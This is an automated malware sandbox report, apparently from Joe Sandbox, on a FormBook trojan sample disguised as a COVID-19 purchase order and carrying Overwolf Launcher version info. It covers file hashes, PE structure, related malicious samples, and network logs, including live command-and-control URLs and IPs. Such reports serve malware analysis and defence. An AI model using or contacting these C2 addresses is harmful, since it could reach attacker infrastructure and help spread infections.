                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.255.188.83, 92.122.144.200, 51.11.168.160, 40.88.32.150, 92.122.213.194, 92.122.213.247, 8.248.131.254, 8.253.207.120, 67.26.83.254, 8.253.95.120, 8.248.137.254, 20.54.26.129, 168.61.161.212, 52.155.217.156
                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                08:50:23API Interceptor1x Sleep call for process: Po-covid19 2372#w2..exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                34.102.136.180FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                • www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
                                                6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                • www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
                                                Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                • www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
                                                5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                • www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
                                                xrxSVsbRli.exeGet hashmaliciousBrowse
                                                • www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux
                                                3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                • www.qiemfsolutions.com/xle/?D8bDL=df7alruH/sVOZEWxdb4cimNlzghqglI+JQbYN3M53vXLFmJTlVjRvjRu86vT99I8VeyiFG/dAw==&nbph=uzu87Xq
                                                AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                • www.eventsdonevirtually.com/c8so/?Wx=JxEHfAEgu9b4xQJDcyjTWSaEjlpoxhWg+fCl4c24OKbRsAQRgKKiPuXHFwp0UmB835cw&vB=lhr0E
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • www.multipleofferonline.com/nki/?-Z1l=5yWKC4X4OOjUIUftTYCRYdpq8XI+R2ST+EfenRWsFQpL7Lmr0RV0+cHmGR5gosgcZWiS+YlJJw==&5ju=UlSpo
                                                pHUWiFd56t.exeGet hashmaliciousBrowse
                                                • www.brainandbodystrengthcoach.com/csv8/?Rxl=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwzFhp9I+dVCC&LJB=GbtlyLR0j
                                                invoice.xlsxGet hashmaliciousBrowse
                                                • www.cleverwares.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==
                                                BSL 01321 PYT.xlsxGet hashmaliciousBrowse
                                                • www.e-butchery.com/de92/?GBHXf2VP=SyfQvNxnxGuBvZveE7q+Mx8oTZDk0vYyrvtp8jcHqguCzq9Wh/Rqj3ZWA4DRZ6ODcHDiqw==&bB=oN64w0
                                                payment advice.xlsxGet hashmaliciousBrowse
                                                • www.fatboidonuts.com/wgn/?QDKx=ismPDkb1kDsJJlmQEj1IWX8WHEdOBI7aPWpMJ4Az70/HitJ3Qnb/ojRR8i7WZLNLjqtDug==&MDHl9T=mps01jexw
                                                Arrival notice.xlsxGet hashmaliciousBrowse
                                                • www.george-beauty.com/oean/?pJEtdJ=YYiBnx+uTbiyOiWOsIleXMl+TWVBeMM+hRG2hzgR9H7uS/Z2u5QgYOS3OsKMSH1P3GhSdw==&pL08=Grxte8Fh1bipd8g
                                                RFQ.xlsxGet hashmaliciousBrowse
                                                • www.experiencemoretogether.com/aky/?L2Jx=PJExAl&ObUhgbrX=TwjU4bk/hK/Rz/irfwftDMSiQA9z9Xtr+ITmJXkGe82JMHXMiJ/i+qjd6uOQ0U6KfPvIfw==
                                                13012021.exeGet hashmaliciousBrowse
                                                • www.whatilikeabouttoday.com/rbg/?Ezr0p8=arITf878KNHP92&rZvXUD=A6nTsYtjbxvih6vkmaX1Jrl6YwOaLYk0AAMk9b3gNlyy1aX90h7Cg1+rLkFaTXBkKYm6
                                                LOI.exeGet hashmaliciousBrowse
                                                • www.burgersandbarley.com/nhk9/?9r4P2=izkbuIM4pS07nj/jSOe9cHFSdHik4vqQ2XAojvhb7pCHWVIPZ7goRwN7tqCoHPvvvKwVcKFBmg==&0rT=g0DpkZJPuF6Hb
                                                Listings.exeGet hashmaliciousBrowse
                                                • www.uqabi.net/kta/
                                                quotation.exeGet hashmaliciousBrowse
                                                • www.ugcfashion.com/x2ee/?iBZLH8e=gj00CanoOA/MIDSuzzd4wA+9Xgu8XrjDu3Jyqr0DAD/cDq+vlAKlZeTP8PFKHz8QASJL27BTBA==&_RA89r=ZL3D3PvXurq
                                                Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                                • www.aaliyahchhabra.com/hpg3/?b8=omXuB1JLE2RxeysDSMNUzZRSUIahHxHrLG/5bHt0ZFUEfFlaWVdzHHrASVFC83QB2ak+xsl1fQ==&C0D=_DK4YF6
                                                Revise Order.exeGet hashmaliciousBrowse
                                                • www.endpedophiles.com/ehxh/?Lh0l=ZTdpL2D0k&nVjxUJ=zzMqP3gr9AvtiM4KAG8kTXsRbsDP8AWJ/7zGMGcvxlaU9iwirqdQaCWQ+gUupaaEafR3
                                                165.160.13.2061Order 0516.exeGet hashmaliciousBrowse
                                                • www.ostrum-am.com//ti/
                                                index[1].htmGet hashmaliciousBrowse
                                                • www.replicarolexllc.com/favicon.ico
                                                1(RFQ) - 14000102697.exeGet hashmaliciousBrowse
                                                • www.allianzpartnershop.com/ma/?BtIL=TV7UHZzggVvSZQDAWvGTdcqQjAICBJyilGxCRJLxTLSDLGEYUsm0jkgD8/qj9CQ5FOV8&_jL0dX=6lR0Brc8LNMdo8GP

                                                Domains

                                                No context

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CSCUSmicrosoft.exeGet hashmaliciousBrowse
                                                • 165.160.15.20
                                                POWERLINE-AS-APPOWERLINEDATACENTERHK5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                • 154.215.48.175
                                                3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                • 154.92.73.145
                                                6OUYcd3GIs.exeGet hashmaliciousBrowse
                                                • 154.216.110.70
                                                Swift transferi pdf.exeGet hashmaliciousBrowse
                                                • 156.242.159.206
                                                yaQjVEGNEb.exeGet hashmaliciousBrowse
                                                • 154.93.103.186
                                                zz4osC4FRa.exeGet hashmaliciousBrowse
                                                • 154.216.110.171
                                                btVnDhh5K7.exeGet hashmaliciousBrowse
                                                • 154.201.243.172
                                                c6Rg7xug26.exeGet hashmaliciousBrowse
                                                • 154.218.55.251
                                                PURCHASE ORDER-34002174.docGet hashmaliciousBrowse
                                                • 156.252.104.205
                                                PO 24000109490.xlsxGet hashmaliciousBrowse
                                                • 154.216.110.70
                                                Pending PURCHASE ORDER - 47001516.pdf.exeGet hashmaliciousBrowse
                                                • 154.213.237.41
                                                order FTH2004-005 .exeGet hashmaliciousBrowse
                                                • 154.213.159.8
                                                https://bit.ly/3hDDoTmGet hashmaliciousBrowse
                                                • 160.124.53.36
                                                Order (2021.01.06).exeGet hashmaliciousBrowse
                                                • 107.151.72.246
                                                order FTH2004-005.exeGet hashmaliciousBrowse
                                                • 154.213.159.8
                                                990109.exeGet hashmaliciousBrowse
                                                • 154.218.215.218
                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                • 154.216.102.213
                                                scan_118637_pdf.exeGet hashmaliciousBrowse
                                                • 154.209.36.118
                                                SecuriteInfo.com.Heur.16160.xlsGet hashmaliciousBrowse
                                                • 154.209.36.118
                                                TqWufCUvxV.exeGet hashmaliciousBrowse
                                                • 154.218.55.251
                                                GOOGLEUSFtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                • 35.204.150.5
                                                6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                xrxSVsbRli.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                81msxxUisn.exeGet hashmaliciousBrowse
                                                • 216.239.36.21
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                pHUWiFd56t.exeGet hashmaliciousBrowse
                                                • 35.184.90.176
                                                invoice.xlsxGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                BSL 01321 PYT.xlsxGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                payment advice.xlsxGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                Arrival notice.xlsxGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                RFQ.xlsxGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                5Q8WDPTQu3.jarGet hashmaliciousBrowse
                                                • 108.177.119.139
                                                13012021.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                1gEpBw4A95.exeGet hashmaliciousBrowse
                                                • 216.239.32.21
                                                Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsGet hashmaliciousBrowse
                                                • 108.177.119.128
                                                LOI.exeGet hashmaliciousBrowse
                                                • 34.102.136.180
                                                CLOUDFLARENETUSFtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                • 104.24.111.173
                                                3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                • 104.19.152.30
                                                cGLVytu1ps.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                onYLLDPXswyCVZu.exeGet hashmaliciousBrowse
                                                • 104.28.4.151
                                                AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO-75013.exeGet hashmaliciousBrowse
                                                • 104.28.4.151
                                                BSL 01321 PYT.xlsxGet hashmaliciousBrowse
                                                • 66.235.200.145
                                                mssecsvc.exeGet hashmaliciousBrowse
                                                • 104.17.244.81
                                                ZwFwevQtlv.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                ssDV3d9O9o.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                wjSwL3KItA.exeGet hashmaliciousBrowse
                                                • 104.28.4.151
                                                Invoice-ID43739424297.vbsGet hashmaliciousBrowse
                                                • 104.28.30.67
                                                Company Docs.exeGet hashmaliciousBrowse
                                                • 104.23.98.190
                                                SecuriteInfo.com.Generic.mg.5a4b41327cabca49.exeGet hashmaliciousBrowse
                                                • 104.28.5.151
                                                #U266b Audio_47720.wavv - - Copy.htmGet hashmaliciousBrowse
                                                • 104.18.54.96
                                                PortionPac Chemical Corp..htmlGet hashmaliciousBrowse
                                                • 104.16.19.94
                                                TD-10057.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                NKP210102-NIT-SC2.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                Listings.exeGet hashmaliciousBrowse
                                                • 162.159.134.233

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.log
                                                Process:C:\Users\user\Desktop\Po-covid19 2372#w2..exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.355304211458859
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.200648874318885
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Po-covid19 2372#w2..exe
                                                File size:1304576
                                                MD5:bf53c9dc0d0f032033c318aceef906c6
                                                SHA1:eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
                                                SHA256:a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
                                                SHA512:7db00f26f4c0e6e6865ff4561ace1d6af4c8804e8534b29d6b1977f48c1863b7fbbd766a360e9d400aad4070568d33247e832b07da69a482004f14eab7c61383
                                                SSDEEP:24576:SlSjKBb8prhPsxedJuxzPiGqi4y5GLLnr:SlS+BQhEAJuxjlqhnr
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?^._..............0..b............... ........@.. .......................`............@................................

                                                File Icon

                                                Icon Hash:d4d6d2d2d2ccc4d4

                                                Static PE Info

                                                General

                                                Entrypoint:0x5080fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x5FFE5E3F [Wed Jan 13 02:43:11 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1080a40x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x381a0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1440000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x1061040x106200False0.756649193789data7.44459929766IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0x10a0000x381a00x38200False0.308106556236data5.20096741512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x1440000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x10a4600x668data
                                                RT_ICON0x10aac80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2290649224, next used block 7403519
                                                RT_ICON0x10adb00x1e8data
                                                RT_ICON0x10af980x128GLS_BINARY_LSB_FIRST
                                                RT_ICON0x10b0c00x6739PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                RT_ICON0x1117fc0xea8data
                                                RT_ICON0x1126a40x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                RT_ICON0x112f4c0x6c8data
                                                RT_ICON0x1136140x568GLS_BINARY_LSB_FIRST
                                                RT_ICON0x113b7c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                RT_ICON0x1243a40x94a8data
                                                RT_ICON0x12d84c0x67e8data
                                                RT_ICON0x1340340x5488data
                                                RT_ICON0x1394bc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
                                                RT_ICON0x13d6e40x25a8data
                                                RT_ICON0x13fc8c0x10a8data
                                                RT_ICON0x140d340x988data
                                                RT_ICON0x1416bc0x468GLS_BINARY_LSB_FIRST
                                                RT_GROUP_ICON0x141b240x102data
                                                RT_VERSION0x141c280x388data
                                                RT_MANIFEST0x141fb00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyrightCopyright Overwolf 2011 - 2020
                                                Assembly Version2.159.0.0
                                                InternalNamefC.exe
                                                FileVersion2.159.0.0
                                                CompanyNameOverwolf Ltd.
                                                LegalTrademarks
                                                CommentsOverwolf Launcher
                                                ProductNameOverwolfLauncher
                                                ProductVersion2.159.0.0
                                                FileDescriptionOverwolfLauncher
                                                OriginalFilenamefC.exe

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/13/21-08:51:26.238514TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.3
                                                01/13/21-08:51:47.060177TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3165.160.13.20
                                                01/13/21-08:51:47.060177TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3165.160.13.20
                                                01/13/21-08:51:47.060177TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.3165.160.13.20

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 13, 2021 08:51:26.058993101 CET4973680192.168.2.334.102.136.180
                                                Jan 13, 2021 08:51:26.099194050 CET804973634.102.136.180192.168.2.3
                                                Jan 13, 2021 08:51:26.099675894 CET4973680192.168.2.334.102.136.180
                                                Jan 13, 2021 08:51:26.099952936 CET4973680192.168.2.334.102.136.180
                                                Jan 13, 2021 08:51:26.140018940 CET804973634.102.136.180192.168.2.3
                                                Jan 13, 2021 08:51:26.238513947 CET804973634.102.136.180192.168.2.3
                                                Jan 13, 2021 08:51:26.238548994 CET804973634.102.136.180192.168.2.3
                                                Jan 13, 2021 08:51:26.238703012 CET4973680192.168.2.334.102.136.180
                                                Jan 13, 2021 08:51:26.238806009 CET4973680192.168.2.334.102.136.180
                                                Jan 13, 2021 08:51:26.278973103 CET804973634.102.136.180192.168.2.3
                                                Jan 13, 2021 08:51:46.925688982 CET4973780192.168.2.3165.160.13.20
                                                Jan 13, 2021 08:51:47.059837103 CET8049737165.160.13.20192.168.2.3
                                                Jan 13, 2021 08:51:47.060144901 CET4973780192.168.2.3165.160.13.20
                                                Jan 13, 2021 08:51:47.060177088 CET4973780192.168.2.3165.160.13.20
                                                Jan 13, 2021 08:51:47.194394112 CET8049737165.160.13.20192.168.2.3
                                                Jan 13, 2021 08:51:47.204091072 CET8049737165.160.13.20192.168.2.3
                                                Jan 13, 2021 08:51:47.204368114 CET8049737165.160.13.20192.168.2.3
                                                Jan 13, 2021 08:51:47.204384089 CET4973780192.168.2.3165.160.13.20
                                                Jan 13, 2021 08:51:47.204555988 CET4973780192.168.2.3165.160.13.20
                                                Jan 13, 2021 08:51:47.338469982 CET8049737165.160.13.20192.168.2.3
                                                Jan 13, 2021 08:52:09.772108078 CET4974080192.168.2.3154.92.73.140
                                                Jan 13, 2021 08:52:10.069128990 CET8049740154.92.73.140192.168.2.3
                                                Jan 13, 2021 08:52:10.069379091 CET4974080192.168.2.3154.92.73.140
                                                Jan 13, 2021 08:52:10.069588900 CET4974080192.168.2.3154.92.73.140
                                                Jan 13, 2021 08:52:10.366414070 CET8049740154.92.73.140192.168.2.3
                                                Jan 13, 2021 08:52:10.370596886 CET8049740154.92.73.140192.168.2.3
                                                Jan 13, 2021 08:52:10.370621920 CET8049740154.92.73.140192.168.2.3
                                                Jan 13, 2021 08:52:10.371207952 CET4974080192.168.2.3154.92.73.140
                                                Jan 13, 2021 08:52:10.371253967 CET4974080192.168.2.3154.92.73.140
                                                Jan 13, 2021 08:52:10.668201923 CET8049740154.92.73.140192.168.2.3
                                                Jan 13, 2021 08:52:29.575284004 CET4974180192.168.2.3104.24.109.70
                                                Jan 13, 2021 08:52:29.626151085 CET8049741104.24.109.70192.168.2.3
                                                Jan 13, 2021 08:52:29.626616001 CET4974180192.168.2.3104.24.109.70
                                                Jan 13, 2021 08:52:29.626843929 CET4974180192.168.2.3104.24.109.70
                                                Jan 13, 2021 08:52:29.677926064 CET8049741104.24.109.70192.168.2.3
                                                Jan 13, 2021 08:52:29.685899973 CET8049741104.24.109.70192.168.2.3
                                                Jan 13, 2021 08:52:29.686090946 CET8049741104.24.109.70192.168.2.3
                                                Jan 13, 2021 08:52:29.686255932 CET4974180192.168.2.3104.24.109.70
                                                Jan 13, 2021 08:52:29.686317921 CET4974180192.168.2.3104.24.109.70
                                                Jan 13, 2021 08:52:29.736743927 CET8049741104.24.109.70192.168.2.3

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 13, 2021 08:50:11.885349989 CET5754453192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:11.933260918 CET53575448.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:16.002233028 CET5598453192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:16.053175926 CET53559848.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:17.099298000 CET6418553192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:18.100469112 CET6418553192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:18.937895060 CET53641858.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:19.940901995 CET6511053192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:19.988956928 CET53651108.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:20.795383930 CET5836153192.168.2.38.8.8.8
                                                Jan 13, 2021 08:50:20.843681097 CET53583618.8.8.8192.168.2.3
                                                Jan 13, 2021 08:50:21.789251089 CET6349253192.168.2.38.8.8.8
